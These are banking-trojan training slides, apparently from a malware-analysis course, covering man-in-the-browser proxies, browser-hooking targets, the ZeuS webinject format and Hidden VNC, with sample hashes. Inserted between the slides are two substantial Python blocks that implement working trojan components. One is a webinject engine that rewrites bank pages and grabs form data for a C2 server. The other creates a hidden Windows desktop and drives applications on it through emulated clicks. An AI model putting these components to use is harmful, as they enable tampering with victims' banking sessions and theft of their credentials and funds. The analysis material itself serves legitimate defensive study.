Typical Goals of Malware and Their Implementations
https://github.com/hasherezade/malware_training_vol1
Dissecting a Banking Trojan
Banking Trojans - families
• Zbots – (a family of various forks of the ZeuS code)
• IcedID
• Tinba
• Gozi (and Gozi-based)
• Kronos
• TrickBot (some of the modules)
• ...and others
Elements of a Banking Trojan
• Classic banking trojans modify the content of selected websites (those related to banking
transactions):
• Webinjects
• Webgrabbers
• An important element of a banking trojan is the MITB proxy (Man-In-The-Browser)
• The MITB proxy is a local proxy through which the browser's traffic is routed and modified
• Sometimes, to bypass the protections used by banks, the operator needs to remotely
access and use the victim machine (using Hidden VNC)
Elements of a Banking Trojan
[Diagram: a malicious implant inside the browser process, and a process running the malware core, which communicates with the C2 server]
Elements of a Banking Trojan
• The malware can run its own proxy server, to which the browser connects whenever it
tries to connect to the target address
• The redirection is implemented by hooking the function responsible for establishing the
connection
• The traffic that passes through the malicious proxy is parsed, and may be augmented with
webinjects
Operation of a Banking Trojan
• Instead of connecting directly to the remote server, the browser connects to the local
proxy, run by the malware's core module
[Diagram, labelled "infected"]
Operation of a Banking Trojan
• The requested page is first processed by the malicious proxy...
[Diagram, labelled "original"]
Operation of a Banking Trojan
• The proxy uses a special template to know where to implant the webinjects
• When the pattern is found, the malicious code is implanted
[Diagram, labelled "infected"]
MiTB Proxy - implementation
• Run a local proxy able to parse HTTP/HTTPS traffic
• Requires generating your own certificate; since the browser would reject it, the malware
also has to hook the browser's certificate validation
• Functions hooked, depending on the browser:
• Ws2_32.connect – redirect the connection to the local proxy
• nss3.SSL_AuthCertificateHook – certificate validation in NSS (used by Firefox)
• Crypt32.CertGetCertificateChain, Crypt32.CertVerifyCertificateChainPolicy – certificate
validation in CryptoAPI (Internet Explorer, and other browsers that delegate verification
to the Windows certificate store)
Case-study time...
Webinjects – implementation
• The definitions of Webinjects following the ZeuS standard:

set_url https://* GP
data_before
<title>
data_end
data_after
</title>
data_end
data_inject
INJECT
data_end

• Flags that can follow the URL mask in set_url:
• P - run on POST request.
• G - run on GET request.
• L - if this symbol is specified, then the launch occurs as an HTTP grabber; if not
specified, then as an HTTP injection.
• H - complements the "L" character: saves content without HTML tag clipping. In normal
mode, all HTML tags are deleted, and some are converted to the newline or space
character.
• I - compare the url parameter case-sensitively (for the English alphabet only).
• C - compare case-insensitively (for the English alphabet only).
• B - block execution of the injection.
Webinjects – implementation
• The webinjects are installed following a configuration file, that is usually downloaded from
the C2 server
https://gist.github.com/hashereware/07b9c2a8624498030a942fccf277bbdb#file-webinjects1-txt-L80
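The following is an added example of what the MITB proxy does with a page once it has the configuration above: it parses set_url blocks in the ZeuS webinject format and applies them to an HTTP response. It is not code from the training materials or from any of the families listed; the configuration text and the hostname example-bank.test are constructed, and a few details of the format are assumptions: the text between data_before and data_after is replaced by data_inject, matching is case-insensitive unless the I flag is given, and '#' in a mask matches a single character.

```python
import re
from dataclasses import dataclass

# Constructed sample configuration (added example, not a real family's config).
SAMPLE_CONFIG = """\
set_url https://*.example-bank.test/login* GP
data_before
<title>
data_end
data_after
</title>
data_end
data_inject
Example Bank - Secure Login
data_end

set_url https://*.example-bank.test/transfer* PL
data_before
name="iban" value="
data_end
data_after
"
data_end
data_inject
data_end
"""


@dataclass
class Rule:
    url_mask: str
    flags: str
    before: str = ""
    after: str = ""
    inject: str = ""

    def matches(self, url: str) -> bool:
        # Assumed mask syntax: '*' = any run of characters, '#' = one character.
        # Assumed default: case-insensitive unless the 'I' flag is present.
        pattern = "".join(".*" if c == "*" else "." if c == "#" else re.escape(c)
                          for c in self.url_mask)
        return re.fullmatch(pattern, url, 0 if "I" in self.flags else re.IGNORECASE) is not None


def parse_config(text: str) -> list:
    """Parse set_url blocks; each data_* section runs until a data_end line."""
    rules, rule, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url"):
            parts = line.split()
            rule = Rule(parts[1], parts[2] if len(parts) > 2 else "")
            rules.append(rule)
        elif line in ("data_before", "data_after", "data_inject"):
            section, buf = line[len("data_"):], []
        elif line == "data_end" and rule is not None and section is not None:
            setattr(rule, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def _locate(html: str, rule: Rule):
    """(start, end) of the span between data_before and data_after, or None."""
    start = html.find(rule.before)
    if start < 0:
        return None
    start += len(rule.before)
    end = html.find(rule.after, start) if rule.after else start
    return None if end < 0 else (start, end)


TAG_RE = re.compile(r"<[^>]*>")
BREAK_RE = re.compile(r"<(br\s*/?|/p|/div|/tr)>", re.IGNORECASE)


def grab(html: str, rule: Rule):
    """Grabber mode (L): return the delimited content; strip tags unless H is set."""
    span = _locate(html, rule)
    if span is None:
        return None
    chunk = html[span[0]:span[1]]
    if "H" not in rule.flags:
        chunk = TAG_RE.sub("", BREAK_RE.sub("\n", chunk))  # some tags become newlines
    return chunk


def inject(html: str, rule: Rule) -> str:
    """Injection mode: replace the delimited span with data_inject (assumed semantics)."""
    span = _locate(html, rule)
    return html if span is None else html[:span[0]] + rule.inject + html[span[1]:]


def process_response(url: str, method: str, html: str, rules: list):
    """Run every matching rule over a response, as the local proxy would."""
    grabbed = {}
    for rule in rules:
        if "B" in rule.flags or method[0].upper() not in rule.flags or not rule.matches(url):
            continue
        if "L" in rule.flags:
            data = grab(html, rule)
            if data is not None:
                grabbed[rule.url_mask] = data
        else:
            html = inject(html, rule)
    return html, grabbed
```

process_response is the piece a proxy would call on each decrypted response body before forwarding it to the browser; the grabbed dictionary is what the webgrabber would ship to the C2.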
Webinjects - implementation
• This is where the observed script came from...
Hidden VNC – the idea
• In order to perform some banking operations, the attackers need to use a VNC on the
victim machine
• In a normal case, the victim could see the attacker's movements on their desktop
• In order to hide them, the attackers use the feature of alternative desktops
• this feature is well known to Linux users; on Windows it is uncommon, yet feasible
• You can create an alternative Desktop on Windows, and switch some applications to be
displayed there
• Example: https://github.com/MalwareTech/CreateDesktop/
Hidden VNC – overview
[Diagram: the HiddenVNC module on the victim machine exchanging data with the malware operator]
• HiddenVNC module: creates the Hidden Desktop, sends screenshots, performs the received
actions on the Hidden Desktop, gets the updated state, sends screenshots again
• The malware operator: renders a local view, performs the actions on the local view, sends
clicks and movements, updates the local view
Hidden VNC - rendering
• Windows renders only the elements of the currently active desktop, so using the
alternative desktop simultaneously is not easy: it requires a manual implementation of the
rendering
• EnumDesktopWindows – get the list of all windows running on the Desktop
• PrintWindow – render the window to a bitmap
• messages: WM_PRINT, WM_PRINTCLIENT
• Some applications don't handle those messages, so the malware has to hook them and
provide its own implementations
• It can be implemented e.g. by hooking user32.dll, or by window subclassing
(SetWindowLong, SetWindowLongPtr)
Hidden VNC – user input
• The messages about the user input (keyboard, mouse, etc.) are delivered only to the active
Desktop
• The Hidden VNC module has to implement emulation of a virtual keyboard and mouse
• It requires keeping track of every window on the Hidden Desktop, each one's location, and
which of them the mouse cursor is over
• Sending PostMessage to the target window to emulate the user input
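As an added example for the rendering and user-input slides above (not code from the training materials or from any Hidden VNC module), the Python below keeps the window tree of a hidden desktop and turns an operator's click at screen coordinates into the PostMessage calls a real mouse would have produced. The hit-testing part is plain Python and runs anywhere; the Win32 part (CreateDesktopW, EnumDesktopWindows, EnumChildWindows, GetWindowRect, PostMessageW via ctypes) only runs on Windows. Assumptions: the desktop name "hvnc_demo", coordinates relative to the window rectangle rather than the client area, and child windows appended in enumeration order as their z-order. Rendering with PrintWindow is not part of this block.

```python
import sys
from dataclasses import dataclass, field

# Win32 message constants (winuser.h)
WM_MOUSEMOVE, WM_LBUTTONDOWN, WM_LBUTTONUP = 0x0200, 0x0201, 0x0202
MK_LBUTTON = 0x0001


@dataclass
class Win:
    """One window on the hidden desktop; rect in screen coordinates (GetWindowRect)."""
    hwnd: int
    left: int
    top: int
    right: int
    bottom: int
    children: list = field(default_factory=list)  # z-ordered, topmost first (assumption)

    def contains(self, x, y):
        return self.left <= x < self.right and self.top <= y < self.bottom


def make_lparam(x, y):
    """MAKELPARAM: low 16 bits = x, high 16 bits = y."""
    return ((y & 0xFFFF) << 16) | (x & 0xFFFF)


def hit_test(windows, x, y):
    """Deepest window under (x, y); `windows` is z-ordered, topmost first."""
    for w in windows:
        if w.contains(x, y):
            return hit_test(w.children, x, y) or w
    return None


def click_messages(windows, x, y):
    """Messages emulating a left click at screen (x, y) on the hidden desktop."""
    w = hit_test(windows, x, y)
    if w is None:
        return []
    lp = make_lparam(x - w.left, y - w.top)  # simplification: rect-relative coordinates
    return [(w.hwnd, WM_MOUSEMOVE, 0, lp),
            (w.hwnd, WM_LBUTTONDOWN, MK_LBUTTON, lp),
            (w.hwnd, WM_LBUTTONUP, 0, lp)]


if sys.platform == "win32":
    import ctypes
    from ctypes import wintypes

    user32 = ctypes.WinDLL("user32", use_last_error=True)
    GENERIC_ALL = 0x10000000
    EnumProc = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND, wintypes.LPARAM)
    user32.CreateDesktopW.restype = ctypes.c_void_p
    user32.CreateDesktopW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, ctypes.c_void_p,
                                      wintypes.DWORD, wintypes.DWORD, ctypes.c_void_p]
    user32.EnumDesktopWindows.argtypes = [ctypes.c_void_p, EnumProc, wintypes.LPARAM]
    user32.EnumChildWindows.argtypes = [wintypes.HWND, EnumProc, wintypes.LPARAM]
    user32.PostMessageW.argtypes = [wintypes.HWND, wintypes.UINT, wintypes.WPARAM, wintypes.LPARAM]

    def create_hidden_desktop(name="hvnc_demo"):
        """Create (or open) a desktop that is never switched to, so nothing on it is shown."""
        hdesk = user32.CreateDesktopW(name, None, None, 0, GENERIC_ALL, None)
        if not hdesk:
            raise ctypes.WinError(ctypes.get_last_error())
        return hdesk

    def _rect(hwnd):
        r = wintypes.RECT()
        user32.GetWindowRect(hwnd, ctypes.byref(r))
        return r.left, r.top, r.right, r.bottom

    def snapshot(hdesk):
        """Rebuild the window tree: EnumDesktopWindows yields top-level windows in z-order."""
        tops = []

        @EnumProc
        def on_top(hwnd, _):
            if user32.IsWindowVisible(hwnd):
                w = Win(hwnd, *_rect(hwnd))

                @EnumProc
                def on_child(child, _):
                    w.children.append(Win(child, *_rect(child)))
                    return True
                user32.EnumChildWindows(hwnd, on_child, 0)
                tops.append(w)
            return True
        user32.EnumDesktopWindows(hdesk, on_top, 0)
        return tops

    def post(messages):
        for hwnd, msg, wparam, lparam in messages:
            user32.PostMessageW(hwnd, msg, wparam, lparam)

    if __name__ == "__main__":
        hdesk = create_hidden_desktop()
        # Applications are placed on this desktop by starting them with
        # STARTUPINFO.lpDesktop = "hvnc_demo" (not shown here).
        post(click_messages(snapshot(hdesk), 40, 40))
```

A real module refreshes the snapshot before every emulated event, because the operator's local view lags behind the hidden desktop and a click computed against stale rectangles would land on the wrong window.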
Hidden VNC – examples
• Many Banking trojans use Hidden VNC as a separate module
• IcedID ("helpdesk" module)
• 2959091ac9e2a544407a2ecc60ba941b – helpdesk.dll
• Silent Night Zbot (hvnc32.dll/hvnc64.dll)
• 7ee0fd4e617d98748fbf07d54925dc12 – hvnc32.dll